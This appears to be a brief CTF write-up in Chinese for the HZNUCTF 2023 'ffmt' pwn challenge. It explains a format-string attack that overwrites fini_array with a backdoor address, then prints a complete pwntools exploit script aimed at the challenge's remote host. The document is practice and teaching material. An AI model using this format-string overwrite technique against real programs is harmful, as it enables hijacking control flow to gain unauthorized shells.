Problem: [HZNUCTF 2023 preliminary]ffmt
思路
- 解题大致思路
劫持fini_array为backdoor地址即可
使用readelf -a ffmt查看fini_array地址
write_size要设置为long才能绕过限制
EXP
- 具体攻击代码
from pwn import *
from LibcSearcher import *
context(arch='amd64', os='linux', log_level='debug')
# io = process('./silverwolf')
io = remote('node5.anna.nssctf.cn', 25351)
s = lambda content: io.send(content)
sl = lambda content: io.sendline(content)
sa = lambda content, send: io.sendafter(content, send)
sla = lambda content, send: io.sendlineafter(content, send)
rc = lambda number: io.recv(number)
ru = lambda content: io.recvuntil(content)
def slog(name, address): print("\033[40;31m[+]\033[40;35m" + name + "==>" + hex(address) + "\033[0m")
def debug(): gdb.attach(io)
def get_address(): return u64(ru(b'\x7f')[-6:].ljust(8, b'\x00'))
fini_array = 0x403228
back_door = 0x40121B
sla(b'name: ', 'test')
payload = fmtstr_payload(6, {fini_array:back_door}, write_size="long")
sla(b'yourself~', payload)
io.interactive()
总结
- 对该题的考点总结